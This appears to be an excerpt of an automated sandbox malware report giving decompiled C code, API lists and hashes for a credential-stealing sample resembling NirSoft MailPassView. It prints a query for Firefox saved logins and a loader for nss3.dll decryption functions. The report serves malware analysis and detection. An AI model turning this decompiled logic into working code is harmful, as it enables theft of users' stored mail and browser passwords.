                                                                                                                                                    • String ID: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins$imap://%s$mailbox://%s
                                                                                                                                                    • API String ID: 4276617627-3913509535
                                                                                                                                                    • Opcode ID: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                                                                                    • Instruction ID: 531ad7aca3640aed267cd003a13377454315b37e4b42da830508d09ae9ff7478
                                                                                                                                                    • Opcode Fuzzy Hash: 93cdc50bd840dfc44d83282a7c9c7e4a4c6f33fe3d7da29804190475922260c9
                                                                                                                                                    • Instruction Fuzzy Hash: 58B10A72C00219ABDB20EFA5CC819DEB7BDEF04315F1445BBE619B2191DB38AB858F54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040A774 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 285windowregistrystringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                    			E0040A774(intOrPtr __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HMENU__* _t121;
				struct HWND__* _t122;
				intOrPtr _t128;
				int _t133;
				intOrPtr _t135;
				int _t149;
				void* _t166;
				void* _t174;
				void* _t178;
				void* _t185;
				intOrPtr _t194;
				void* _t197;
				void* _t198;
				intOrPtr _t200;
				intOrPtr _t201;
				void* _t202;
				int _t204;
				intOrPtr _t205;
				intOrPtr* _t207;
				intOrPtr* _t208;
				void* _t210;
				intOrPtr* _t211;
				void* _t213;

				_t213 = __eflags;
				_t208 = _t210 - 0x78;
				_t211 = _t210 - 0xb8;
				 *((intOrPtr*)(_t208 + 0x70)) = __ecx;
				 *((char*)(_t208 - 0x37)) = 1;
				 *(_t208 - 0x40) = 0;
				 *((intOrPtr*)(_t208 - 0x3c)) = 0;
				 *((char*)(_t208 - 0x38)) = 0;
				 *((char*)(_t208 - 0x36)) = 0;
				 *((char*)(_t208 - 0x35)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 0x2c) = 1;
				 *((intOrPtr*)(_t208 - 0x28)) = 0x9c41;
				 *((char*)(_t208 - 0x24)) = 4;
				 *((char*)(_t208 - 0x23)) = 0;
				 *((char*)(_t208 - 0x22)) = 0;
				 *((char*)(_t208 - 0x21)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 - 0x18)) = 5;
				 *((intOrPtr*)(_t208 - 0x14)) = 0x9c44;
				 *((char*)(_t208 - 0x10)) = 4;
				 *((char*)(_t208 - 0xf)) = 0;
				 *((char*)(_t208 - 0xe)) = 0;
				 *((char*)(_t208 - 0xd)) = 0;
				asm("stosd");
				asm("stosd");
				 *(_t208 - 4) = 2;
				 *_t208 = 0x9c48;
				 *((char*)(_t208 + 4)) = 4;
				 *((char*)(_t208 + 5)) = 0;
				 *((char*)(_t208 + 6)) = 0;
				 *((char*)(_t208 + 7)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x10)) = 3;
				 *((intOrPtr*)(_t208 + 0x14)) = 0x9c49;
				 *((char*)(_t208 + 0x18)) = 4;
				 *((char*)(_t208 + 0x19)) = 0;
				 *((char*)(_t208 + 0x1a)) = 0;
				 *((char*)(_t208 + 0x1b)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x24)) = 0;
				 *((intOrPtr*)(_t208 + 0x28)) = 0x9c4e;
				 *((char*)(_t208 + 0x2c)) = 4;
				 *((char*)(_t208 + 0x2d)) = 0;
				 *((char*)(_t208 + 0x2e)) = 0;
				 *((char*)(_t208 + 0x2f)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x38)) = 6;
				 *((intOrPtr*)(_t208 + 0x3c)) = 0x9c56;
				 *((char*)(_t208 + 0x40)) = 4;
				 *((char*)(_t208 + 0x41)) = 0;
				 *((char*)(_t208 + 0x42)) = 0;
				 *((char*)(_t208 + 0x43)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t208 + 0x4c)) = 4;
				 *((intOrPtr*)(_t208 + 0x50)) = 0x9c42;
				 *((char*)(_t208 + 0x54)) = 4;
				 *((char*)(_t208 + 0x55)) = 0;
				 *((char*)(_t208 + 0x56)) = 0;
				 *((char*)(_t208 + 0x57)) = 0;
				 *(_t208 + 0x6c) =  *(_t208 + 0x6c) | 0xffffffff;
				asm("stosd");
				_t198 = 0x66;
				asm("stosd");
				_t121 = E00407BB9(_t198);
				_t194 =  *((intOrPtr*)(_t208 + 0x70));
				 *(_t194 + 0x11c) = _t121;
				_t122 = SetMenu( *(_t194 + 0x108), _t121);
				__imp__#6(0x50000000, 0x412466,  *(_t194 + 0x108), 0x101, _t185, _t197, _t166);
				 *(_t194 + 0x114) = _t122;
				SendMessageA(_t122, 0x404, 1, _t208 + 0x6c);
				 *((intOrPtr*)(_t194 + 0x118)) = CreateToolbarEx( *(_t194 + 0x108), 0x50010900, 0x102, 7, 0, LoadImageA( *0x416b94, 0x68, 0, 0, 0, 0x9060), _t208 - 0x40, 8, 0x10, 0x10, 0x70, 0x10, 0x14);
				E004023D4( *((intOrPtr*)(_t194 + 0x370)), _t213, CreateWindowExA(0, "SysListView32", 0, 0x50810809, 0, 0, 0x190, 0xc8,  *(_t194 + 0x108), 0x103,  *0x416b94, 0), 1);
				_t128 =  *((intOrPtr*)(_t194 + 0x370));
				_t173 =  *((intOrPtr*)(_t128 + 0x1b0));
				_t200 =  *((intOrPtr*)(_t128 + 0x1b4));
				 *((intOrPtr*)(_t208 + 0x68)) =  *((intOrPtr*)(_t128 + 0x184));
				if(_t173 <= 0) {
					L3:
					_t201 =  *((intOrPtr*)(_t194 + 0x370));
					E00409EC4(_t201);
					_t133 = ImageList_ReplaceIcon( *(_t201 + 0x18c), 0, LoadIconA( *0x416b94, 0x66));
					if( *((intOrPtr*)(_t201 + 0x1b8)) != 0) {
						E00409E32(_t133, _t173, _t194, _t201);
					}
					_t202 = 0x68;
					 *((intOrPtr*)(_t194 + 0x154)) = E00407BB9(_t202);
					_t135 =  *((intOrPtr*)(_t194 + 0x37c));
					if( *((intOrPtr*)(_t135 + 0x30)) <= 0) {
						_t174 = 0x412466;
					} else {
						if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
							_t174 = 0;
						} else {
							_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0xc)))) +  *((intOrPtr*)(_t135 + 0x10));
						}
					}
					_push("/noloadsettings");
					_push(_t174);
					L004115B2();
					if(_t135 == 0) {
						RegDeleteKeyA(0x80000001, "Software\\NirSoft\\MailPassView");
					}
					E0040AF17(_t194, 0);
					 *( *(_t194 + 0x36c)) = 1;
					SetFocus( *( *((intOrPtr*)(_t194 + 0x370)) + 0x184));
					if( *0x417660 == 0) {
						E00406172(0x417660);
						if((GetFileAttributesA(0x417660) & 0x00000001) != 0) {
							GetTempPathA(0x104, 0x417660);
						}
					}
					_t204 = strlen(0x417660);
					 *_t211 = "report.html";
					_t99 = strlen(??) + 1; // 0x1
					_t223 = _t204 + _t99 - 0x104;
					if(_t204 + _t99 >= 0x104) {
						 *((char*)(_t194 + 0x264)) = 0;
					} else {
						E004062AD(_t194 + 0x264, 0x417660, "report.html");
					}
					_push(1);
					_t178 = 0x30;
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), _t178);
					E0040A00B( *((intOrPtr*)(_t194 + 0x370)), 1, ( *(_t194 + 0x36c))[1]);
					_t149 = RegisterWindowMessageA("commdlg_FindReplace");
					_t205 = _t194;
					 *(_t194 + 0x374) = _t149;
					E0040A27F(0, 1, _t205, _t223);
					E00401E8B(_t223,  *((intOrPtr*)(_t205 + 0x370)) + 0xb20);
					 *(_t208 + 0x60) = 0x12c;
					 *((intOrPtr*)(_t208 + 0x64)) = 0x400;
					SendMessageA( *(_t205 + 0x114), 0x404, 2, _t208 + 0x60);
					return SendMessageA( *(_t205 + 0x114), 0x401, 0x1001, 0);
				} else {
					_t207 = _t200 + 0xc;
					 *((intOrPtr*)(_t208 + 0x74)) = _t173;
					do {
						_t173 =  *((intOrPtr*)(_t207 - 8));
						E00404925( *((intOrPtr*)(_t207 + 4)),  *((intOrPtr*)(_t207 - 8)),  *((intOrPtr*)(_t208 + 0x68)),  *((intOrPtr*)(_t207 - 0xc)),  *((intOrPtr*)(_t207 - 4)),  *_t207);
						_t211 = _t211 + 0x10;
						_t207 = _t207 + 0x14;
						_t82 = _t208 + 0x74;
						 *_t82 =  *((intOrPtr*)(_t208 + 0x74)) - 1;
					} while ( *_t82 != 0);
					goto L3;
				}
			}





























                                                                                                                                                    0x0040a774
                                                                                                                                                    0x0040a775
                                                                                                                                                    0x0040a779
                                                                                                                                                    0x0040a782
                                                                                                                                                    0x0040a785
                                                                                                                                                    0x0040a78d
                                                                                                                                                    0x0040a790
                                                                                                                                                    0x0040a793
                                                                                                                                                    0x0040a796
                                                                                                                                                    0x0040a799
                                                                                                                                                    0x0040a79f
                                                                                                                                                    0x0040a7a0
                                                                                                                                                    0x0040a7a1
                                                                                                                                                    0x0040a7a8
                                                                                                                                                    0x0040a7af
                                                                                                                                                    0x0040a7b3
                                                                                                                                                    0x0040a7b6
                                                                                                                                                    0x0040a7b9
                                                                                                                                                    0x0040a7c1
                                                                                                                                                    0x0040a7c2
                                                                                                                                                    0x0040a7c3
                                                                                                                                                    0x0040a7ca
                                                                                                                                                    0x0040a7d1
                                                                                                                                                    0x0040a7d5
                                                                                                                                                    0x0040a7d8
                                                                                                                                                    0x0040a7db
                                                                                                                                                    0x0040a7e3
                                                                                                                                                    0x0040a7e4
                                                                                                                                                    0x0040a7e5
                                                                                                                                                    0x0040a7ec
                                                                                                                                                    0x0040a7f3
                                                                                                                                                    0x0040a7f7
                                                                                                                                                    0x0040a7fa
                                                                                                                                                    0x0040a7fd
                                                                                                                                                    0x0040a805
                                                                                                                                                    0x0040a806
                                                                                                                                                    0x0040a807
                                                                                                                                                    0x0040a80e
                                                                                                                                                    0x0040a815
                                                                                                                                                    0x0040a819
                                                                                                                                                    0x0040a81c
                                                                                                                                                    0x0040a81f
                                                                                                                                                    0x0040a827
                                                                                                                                                    0x0040a828
                                                                                                                                                    0x0040a829
                                                                                                                                                    0x0040a82c
                                                                                                                                                    0x0040a833
                                                                                                                                                    0x0040a837
                                                                                                                                                    0x0040a83a
                                                                                                                                                    0x0040a83d
                                                                                                                                                    0x0040a845
                                                                                                                                                    0x0040a846
                                                                                                                                                    0x0040a847
                                                                                                                                                    0x0040a84e
                                                                                                                                                    0x0040a855
                                                                                                                                                    0x0040a859
                                                                                                                                                    0x0040a85c
                                                                                                                                                    0x0040a85f
                                                                                                                                                    0x0040a867
                                                                                                                                                    0x0040a868
                                                                                                                                                    0x0040a869
                                                                                                                                                    0x0040a870
                                                                                                                                                    0x0040a877
                                                                                                                                                    0x0040a87b
                                                                                                                                                    0x0040a87e
                                                                                                                                                    0x0040a881
                                                                                                                                                    0x0040a884
                                                                                                                                                    0x0040a88d
                                                                                                                                                    0x0040a890
                                                                                                                                                    0x0040a891
                                                                                                                                                    0x0040a892
                                                                                                                                                    0x0040a897
                                                                                                                                                    0x0040a8a1
                                                                                                                                                    0x0040a8a7
                                                                                                                                                    0x0040a8c2
                                                                                                                                                    0x0040a8d4
                                                                                                                                                    0x0040a8da
                                                                                                                                                    0x0040a927
                                                                                                                                                    0x0040a95f
                                                                                                                                                    0x0040a964
                                                                                                                                                    0x0040a96a
                                                                                                                                                    0x0040a972
                                                                                                                                                    0x0040a97e
                                                                                                                                                    0x0040a981
                                                                                                                                                    0x0040a9aa
                                                                                                                                                    0x0040a9aa
                                                                                                                                                    0x0040a9b2
                                                                                                                                                    0x0040a9cd
                                                                                                                                                    0x0040a9d9
                                                                                                                                                    0x0040a9db
                                                                                                                                                    0x0040a9db
                                                                                                                                                    0x0040a9e2
                                                                                                                                                    0x0040a9e8
                                                                                                                                                    0x0040a9ee
                                                                                                                                                    0x0040a9f7
                                                                                                                                                    0x0040aa0c
                                                                                                                                                    0x0040a9f9
                                                                                                                                                    0x0040a9fc
                                                                                                                                                    0x0040aa08
                                                                                                                                                    0x0040a9fe
                                                                                                                                                    0x0040aa03
                                                                                                                                                    0x0040aa03
                                                                                                                                                    0x0040a9fc
                                                                                                                                                    0x0040aa11
                                                                                                                                                    0x0040aa16
                                                                                                                                                    0x0040aa17
                                                                                                                                                    0x0040aa20
                                                                                                                                                    0x0040aa2c
                                                                                                                                                    0x0040aa2c
                                                                                                                                                    0x0040aa35
                                                                                                                                                    0x0040aa40
                                                                                                                                                    0x0040aa52
                                                                                                                                                    0x0040aa63
                                                                                                                                                    0x0040aa65
                                                                                                                                                    0x0040aa73
                                                                                                                                                    0x0040aa7b
                                                                                                                                                    0x0040aa7b
                                                                                                                                                    0x0040aa73
                                                                                                                                                    0x0040aa87
                                                                                                                                                    0x0040aa89
                                                                                                                                                    0x0040aa95
                                                                                                                                                    0x0040aa99
                                                                                                                                                    0x0040aa9f
                                                                                                                                                    0x0040aaba
                                                                                                                                                    0x0040aaa1
                                                                                                                                                    0x0040aab1
                                                                                                                                                    0x0040aab7
                                                                                                                                                    0x0040aac6
                                                                                                                                                    0x0040aaca
                                                                                                                                                    0x0040aacb
                                                                                                                                                    0x0040aae2
                                                                                                                                                    0x0040aaec
                                                                                                                                                    0x0040aaf4
                                                                                                                                                    0x0040aaf6
                                                                                                                                                    0x0040aafc
                                                                                                                                                    0x0040ab0d
                                                                                                                                                    0x0040ab29
                                                                                                                                                    0x0040ab30
                                                                                                                                                    0x0040ab37
                                                                                                                                                    0x0040ab53
                                                                                                                                                    0x0040a983
                                                                                                                                                    0x0040a983
                                                                                                                                                    0x0040a986
                                                                                                                                                    0x0040a989
                                                                                                                                                    0x0040a991
                                                                                                                                                    0x0040a99a
                                                                                                                                                    0x0040a99f
                                                                                                                                                    0x0040a9a2
                                                                                                                                                    0x0040a9a5
                                                                                                                                                    0x0040a9a5
                                                                                                                                                    0x0040a9a5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040a989

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00407BB9: LoadMenuA.USER32 ref: 00407BC1
                                                                                                                                                      • Part of subcall function 00407BB9: sprintf.MSVCRT ref: 00407BE4
                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 0040A8A7
                                                                                                                                                    • #6.COMCTL32(50000000,Function_00012466,?,00000101), ref: 0040A8C2
                                                                                                                                                    • SendMessageA.USER32 ref: 0040A8DA
                                                                                                                                                    • LoadImageA.USER32 ref: 0040A8F0
                                                                                                                                                    • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040A91A
                                                                                                                                                    • CreateWindowExA.USER32 ref: 0040A950
                                                                                                                                                    • LoadIconA.USER32(00000066,00000000), ref: 0040A9BF
                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040A9CD
                                                                                                                                                    • _stricmp.MSVCRT(Function_00012466,/noloadsettings), ref: 0040AA17
                                                                                                                                                    • RegDeleteKeyA.ADVAPI32(80000001,Software\NirSoft\MailPassView), ref: 0040AA2C
                                                                                                                                                    • SetFocus.USER32(?,00000000), ref: 0040AA52
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00417660), ref: 0040AA6B
                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,00417660), ref: 0040AA7B
                                                                                                                                                    • strlen.MSVCRT ref: 0040AA82
                                                                                                                                                    • strlen.MSVCRT ref: 0040AA90
                                                                                                                                                    • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AAEC
                                                                                                                                                      • Part of subcall function 00404925: strlen.MSVCRT ref: 00404942
                                                                                                                                                      • Part of subcall function 00404925: SendMessageA.USER32 ref: 00404966
                                                                                                                                                    • SendMessageA.USER32 ref: 0040AB37
                                                                                                                                                    • SendMessageA.USER32 ref: 0040AB4A
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$Send$Loadstrlen$CreateIconImageMenuWindow$AttributesDeleteFileFocusList_PathRegisterReplaceTempToolbar_stricmpsprintf
                                                                                                                                                    • String ID: /noloadsettings$Software\NirSoft\MailPassView$SysListView32$`vA$commdlg_FindReplace$report.html
                                                                                                                                                    • API String ID: 873469642-860065374
                                                                                                                                                    • Opcode ID: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                                                                                    • Instruction ID: ca2bded9840d9beafebaacef77bacb5142d556b3fd29cdc4ce09694084a06bb6
                                                                                                                                                    • Opcode Fuzzy Hash: a4e7fbf76496b0a5143eb8d44d5c426d23ad41d46f34e9c279854c8240868147
                                                                                                                                                    • Instruction Fuzzy Hash: 82B12271644388FFEB16CF74CC45BDABBA5BF14304F00406AFA44A7292C7B5A954CB5A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DB39 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                    			E0040DB39(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, void _a10, unsigned int _a12, void _a264, void _a265, void _a520, void _a521, void _a776, void _a780, char _a784, char _a1056, void _a1057, char _a2080, void _a2081, char _a3104, void _a3105) {
				char _v0;
				struct HWND__* _v4;
				void* __edi;
				void* _t44;
				void* _t58;
				int _t59;
				int _t61;
				int _t62;
				long _t66;
				struct HWND__* _t93;
				intOrPtr _t122;
				unsigned int _t125;
				signed int _t127;
				signed int _t128;
				void* _t134;

				_t128 = _t127 & 0xfffffff8;
				E004118A0(0x1424, __ecx);
				_t44 = _a8 - 0x110;
				if(_t44 == 0) {
					E00406491(__edx, _a4);
					 *_t128 = 0x7ff;
					_a3104 = 0;
					memset( &_a3105, 0, ??);
					asm("movsd");
					asm("movsd");
					asm("movsw");
					memset( &_a10, 0, 0xfb);
					_a520 = 0;
					memset( &_a521, 0, 0xff);
					_a264 = 0;
					memset( &_a265, 0, 0xff);
					_a1056 = 0;
					memset( &_a1057, 0, 0x3ff);
					_a2080 = 0;
					memset( &_a2081, 0, 0x3ff);
					_t134 = _t128 + 0x48;
					_t58 = GetCurrentProcess();
					_t102 =  &_a520;
					_v4 = _t58;
					_t59 = ReadProcessMemory(_t58,  *0x416c64,  &_a520, 0x80, 0);
					__eflags = _t59;
					if(_t59 != 0) {
						E00406585( &_a1056,  &_a520, 4);
						_pop(_t102);
					}
					_t61 = ReadProcessMemory(_v4,  *0x416c58,  &_a264, 0x80, 0);
					__eflags = _t61;
					if(_t61 != 0) {
						E00406585( &_a2080,  &_a264, 0);
						_pop(_t102);
					}
					_t62 = E0040629C();
					__eflags = _t62;
					if(_t62 == 0) {
						E0040E056();
					} else {
						E0040E0DA();
					}
					__eflags =  *0x417514;
					if(__eflags != 0) {
						L17:
						_a776 = 0;
						memset( &_a780, 0, 0x114);
						_t122 =  *0x416e7c; // 0x0
						_t134 = _t134 + 0xc;
						_t66 = GetCurrentProcessId();
						 *0x417108 = 0;
						E0040E255(_t102, __eflags, _t66, _t122);
						__eflags =  *0x417108;
						if( *0x417108 != 0) {
							memcpy( &_a776, 0x416ff0, 0x118);
							_t134 = _t134 + 0xc;
							__eflags =  *0x417108;
							if( *0x417108 != 0) {
								strcpy( &_v0, E004061E6( &_a784));
							}
						}
						goto L20;
					} else {
						__eflags =  *0x417518;
						if(__eflags == 0) {
							L20:
							sprintf( &_a3104, "Exception %8.8X at address %8.8X in module %s\r\nRegisters: \r\nEAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8X\r\nESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8X\r\nEIP=%8.8X\r\nStack Data: %s\r\nCode Data: %s\r\n",  *0x416e70,  *0x416e7c,  &_v0,  *0x416c50,  *0x416c44,  *0x416c4c,  *0x416c48,  *0x416c40,  *0x416c3c,  *0x416c54,  *0x416c64,  *0x416c58,  &_a1056,  &_a2080);
							SetDlgItemTextA(_a4, 0x3ea,  &_a3104);
							SetFocus(GetDlgItem(_a4, 0x3ea));
							L21:
							return 0;
						}
						goto L17;
					}
				}
				if(_t44 == 1) {
					_t125 = _a12;
					if(_t125 >> 0x10 == 0) {
						if(_t125 == 3) {
							_t93 = GetDlgItem(_a4, 0x3ea);
							_v4 = _t93;
							SendMessageA(_t93, 0xb1, 0, 0xffff);
							SendMessageA(_v4, 0x301, 0, 0);
							SendMessageA(_v4, 0xb1, 0, 0);
						}
					}
				}
				goto L21;
			}


















                                                                                                                                                    0x0040db3c
                                                                                                                                                    0x0040db44
                                                                                                                                                    0x0040db4c
                                                                                                                                                    0x0040db54
                                                                                                                                                    0x0040dbd8
                                                                                                                                                    0x0040dbdf
                                                                                                                                                    0x0040dbef
                                                                                                                                                    0x0040dbf6
                                                                                                                                                    0x0040dc04
                                                                                                                                                    0x0040dc08
                                                                                                                                                    0x0040dc14
                                                                                                                                                    0x0040dc16
                                                                                                                                                    0x0040dc2d
                                                                                                                                                    0x0040dc34
                                                                                                                                                    0x0040dc46
                                                                                                                                                    0x0040dc4d
                                                                                                                                                    0x0040dc64
                                                                                                                                                    0x0040dc6b
                                                                                                                                                    0x0040dc7d
                                                                                                                                                    0x0040dc84
                                                                                                                                                    0x0040dc89
                                                                                                                                                    0x0040dc8c
                                                                                                                                                    0x0040dc9e
                                                                                                                                                    0x0040dcac
                                                                                                                                                    0x0040dcb1
                                                                                                                                                    0x0040dcb3
                                                                                                                                                    0x0040dcb5
                                                                                                                                                    0x0040dcc8
                                                                                                                                                    0x0040dcce
                                                                                                                                                    0x0040dcce
                                                                                                                                                    0x0040dce7
                                                                                                                                                    0x0040dce9
                                                                                                                                                    0x0040dceb
                                                                                                                                                    0x0040dcfd
                                                                                                                                                    0x0040dd03
                                                                                                                                                    0x0040dd03
                                                                                                                                                    0x0040dd04
                                                                                                                                                    0x0040dd09
                                                                                                                                                    0x0040dd0b
                                                                                                                                                    0x0040dd14
                                                                                                                                                    0x0040dd0d
                                                                                                                                                    0x0040dd0d
                                                                                                                                                    0x0040dd0d
                                                                                                                                                    0x0040dd19
                                                                                                                                                    0x0040dd1f
                                                                                                                                                    0x0040dd29
                                                                                                                                                    0x0040dd37
                                                                                                                                                    0x0040dd3e
                                                                                                                                                    0x0040dd43
                                                                                                                                                    0x0040dd49
                                                                                                                                                    0x0040dd4c
                                                                                                                                                    0x0040dd54
                                                                                                                                                    0x0040dd5a
                                                                                                                                                    0x0040dd5f
                                                                                                                                                    0x0040dd67
                                                                                                                                                    0x0040dd7b
                                                                                                                                                    0x0040dd80
                                                                                                                                                    0x0040dd83
                                                                                                                                                    0x0040dd89
                                                                                                                                                    0x0040dd9d
                                                                                                                                                    0x0040dda3
                                                                                                                                                    0x0040dd89
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040dd21
                                                                                                                                                    0x0040dd21
                                                                                                                                                    0x0040dd27
                                                                                                                                                    0x0040dda4
                                                                                                                                                    0x0040de08
                                                                                                                                                    0x0040de21
                                                                                                                                                    0x0040de32
                                                                                                                                                    0x0040de38
                                                                                                                                                    0x0040de40
                                                                                                                                                    0x0040de40
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040dd27
                                                                                                                                                    0x0040dd1f
                                                                                                                                                    0x0040db57
                                                                                                                                                    0x0040db5d
                                                                                                                                                    0x0040db68
                                                                                                                                                    0x0040db8b
                                                                                                                                                    0x0040db99
                                                                                                                                                    0x0040dbb4
                                                                                                                                                    0x0040dbb8
                                                                                                                                                    0x0040dbc5
                                                                                                                                                    0x0040dbce
                                                                                                                                                    0x0040dbce
                                                                                                                                                    0x0040db8b
                                                                                                                                                    0x0040db68
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040DE02
                                                                                                                                                    • {Unknown}, xrefs: 0040DBFB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusTextmemcpysprintfstrcpy
                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                                                                                                                                    • API String ID: 138940113-3474136107
                                                                                                                                                    • Opcode ID: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                                                                                    • Instruction ID: 36e6f19d437acde9dae1843bd1f228cb1d7049f577ea92cd8b51c55dddb48a69
                                                                                                                                                    • Opcode Fuzzy Hash: a83a35a4c36da605d140adb83b4774888d9d4a076b757738f8a3eb1b01500df5
                                                                                                                                                    • Instruction Fuzzy Hash: 6D711C72844244BFD721EF51DC41EEB3BEDEF94344F00843EF649921A0DA399A58CBA9
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040DEEE Relevance: 42.1, APIs: 16, Strings: 8, Instructions: 113libraryloaderstringCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040DEEE(struct HINSTANCE__** __esi, intOrPtr _a4) {
				void _v267;
				char _v268;
				void _v531;
				char _v532;
				void* __ebx;
				void* __edi;
				int _t39;
				void* _t44;
				struct HINSTANCE__* _t53;
				struct HINSTANCE__* _t56;
				struct HINSTANCE__** _t69;

				_t69 = __esi;
				_v268 = 0;
				memset( &_v267, 0, 0x104);
				if(_a4 != 0) {
					E004060D0(0x104,  &_v268, _a4);
				}
				if(_v268 != 0) {
					GetCurrentDirectoryA(0x104,  &(_t69[8]));
					SetCurrentDirectoryA( &_v268);
					_v532 = 0;
					memset( &_v531, 0, 0x104);
					_t39 = strlen("nss3.dll");
					_t13 = strlen( &_v268) + 1; // 0x1
					if(_t39 + _t13 >= 0x104) {
						_v532 = 0;
					} else {
						E004062AD( &_v532,  &_v268, "nss3.dll");
					}
					_t44 = GetModuleHandleA( &_v532);
					 *_t69 = _t44;
					if(_t44 != 0) {
						L9:
						_t69[1] = GetProcAddress( *_t69, "NSS_Init");
						_t69[2] = GetProcAddress( *_t69, "NSS_Shutdown");
						_t69[3] = GetProcAddress( *_t69, "PK11_GetInternalKeySlot");
						_t69[4] = GetProcAddress( *_t69, "PK11_FreeSlot");
						_t69[5] = GetProcAddress( *_t69, "PK11_CheckUserPassword");
						_t69[6] = GetProcAddress( *_t69, "PK11_Authenticate");
						_t69[7] = GetProcAddress( *_t69, "PK11SDR_Decrypt");
					} else {
						_t53 = LoadLibraryExA( &_v532, _t44, 8);
						 *_t69 = _t53;
						if(_t53 != 0) {
							goto L9;
						} else {
							E0040DEA9();
							_t56 = LoadLibraryExA( &_v532, 0, 8);
							 *_t69 = _t56;
							if(_t56 != 0) {
								goto L9;
							}
						}
					}
				}
				return 0 |  *_t69 != 0x00000000;
			}














                                                                                                                                                    0x0040deee
                                                                                                                                                    0x0040df08
                                                                                                                                                    0x0040df0f
                                                                                                                                                    0x0040df1b
                                                                                                                                                    0x0040df26
                                                                                                                                                    0x0040df2b
                                                                                                                                                    0x0040df33
                                                                                                                                                    0x0040df3e
                                                                                                                                                    0x0040df4b
                                                                                                                                                    0x0040df5b
                                                                                                                                                    0x0040df62
                                                                                                                                                    0x0040df6c
                                                                                                                                                    0x0040df7f
                                                                                                                                                    0x0040df88
                                                                                                                                                    0x0040dfa5
                                                                                                                                                    0x0040df8a
                                                                                                                                                    0x0040df9c
                                                                                                                                                    0x0040dfa2
                                                                                                                                                    0x0040dfb3
                                                                                                                                                    0x0040dfbb
                                                                                                                                                    0x0040dfbd
                                                                                                                                                    0x0040dfef
                                                                                                                                                    0x0040e005
                                                                                                                                                    0x0040e011
                                                                                                                                                    0x0040e01d
                                                                                                                                                    0x0040e029
                                                                                                                                                    0x0040e035
                                                                                                                                                    0x0040e041
                                                                                                                                                    0x0040e046
                                                                                                                                                    0x0040dfbf
                                                                                                                                                    0x0040dfcf
                                                                                                                                                    0x0040dfd3
                                                                                                                                                    0x0040dfd5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040dfd7
